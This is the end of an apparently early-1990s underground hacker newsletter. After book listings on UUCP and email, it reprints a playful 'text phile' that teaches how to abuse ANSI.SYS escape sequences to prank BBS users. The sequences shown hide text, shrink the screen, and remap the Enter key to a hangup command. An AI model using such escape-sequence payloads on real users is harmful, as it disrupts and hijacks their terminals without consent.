Todino; ISBN 0-937175-48-X. Date: 1990. Pages: 289. Cost: $24.95 Both are "Nutshell" handbooks. O'Rielly and Associates: 981 Chestnut Street Newton MA 02164 USA, 1-800-338-NUTS. E-mail: ...!uunet!ora!nuts Unix Communications; Bart Anderson, Barry Costales, and Harry Henderson, Harry; The Waite Group. ISBN 0-672-22773-8. Date: 1991. Pages: 736. Cost: $29.95. Covers everything the end user needs to know about email, USENET and UUCP. ------------------------------------------------------------------------------ ------------------ | Article 8 of 8 | ------------------ To: hackers@tsf.UUCP Subject: Text phile 3. From: bbc@tsf.UUCP (The BBC) Organization: The CyberUnderground Welcome, Kiddies... To another jam packed fun day at... The BBC's crash house... Todays secret word is 'ANSI'... Yes after this lesson when ever a sysop/user hears the word 'ANSI', They will scream real loud!!! First lets ask our friend Crashy a question... Crashy, do you use a term package that supports... 'ANSI' [AAAAAAAAHHHHHHH] or have the driver 'ANSI.sys' [AAAAHHHHH] loaded in your config.sys??? 'Well... Yes, I guess'... Good, See kiddies every one uses it but few understand it... An that is how we will play with the users of a bbs's mind as well as the sysops [usually not much of one here]... First a bit of an explanation... ANSI [AAAAHHHHHHH] is a method of controlling IO on remote systems... It uses escape sequences to do every thing from moving the cursor around and changing color of the text to redefining the keyboard keys... A very useful tool for helping computer users and making nice displays.. An a cheep shot as far as hacking games go... But that never stoped us before... For what if some devious minds where to put them to use??? An we are just the ones to do it... Also for those who don't know, [ESC] stands for the escape char. [0x1b] or to type it in remote hold down the ALT key while typing 27 on the numeric key pad then release the ALT key... Lets start with a classic... We all know to change the text color you use the sequence 'ESC[;;...m' and it will change the color for all following text till it is used again... Well what if one uses the command 'ESC[0;8m'... This would cause the ANSI [AAAAHHHHH] driver to reset the color to default then set the screen to black text on a black background... What a glorious sight (or lack of there) when the computer just seems to stop... No text no nothing... An if they don't reset it, well.... All the boards they call afterwards will do the same... Or how about this one... 'ESC[=0h;=7l'... All it does is set the screen to 40 column mode and turns line wrapping off... So there eyes get a rest... only half the calories of a regular screen and in larger portions... Then there is the story of the farmer's 'ESC[26;0H'... Moving the cursor off the screen and making them wait for the next prompt (if this command is at the end of a message) that seams to never come... But you should not tell this joke in polite company... An of course we saved the best for last... The ol' Two Face key change... Just use the command 'ESC[;p' and wha-la instant chaos... For example 'ESC[13;0;35p', next time the [ENTER] key is hit it changes into a ALT-H (The hangup command for most term packages... An we would hope you would not use this to just redefine the whole keyboard so that what they type is not what they get!!! That would be.... bad... An you are not a bunch of bad boys and girls are you... We thought so... So boys and girls... Its time to go... and remember... The night belongs to the hackers... The early hacker gets to DOS... A virus in the system is worth 2 trojans in the bush... Ect.. Ect.. Ect.. 'Another fine mess' from your friends at... The BBC ---------------------------------------------------------------------- ...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC) -=[ "Anarchy is never HAVING to say you're sorry." ]=- ------------------------------------------------------------------------------ That's all folks...keep that e-mail coming! ------------------------------------------------------------------------------ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -= Max Cray =- Internet: underg!max@uunet.uu.net Support UUCP: ...!uunet!idsvax!underg!max Free Data: The Underground Computing Foundation BBS Software 401-847-2603 -=- 9600 baud (v.32) (w/src) CI$: 76334,2203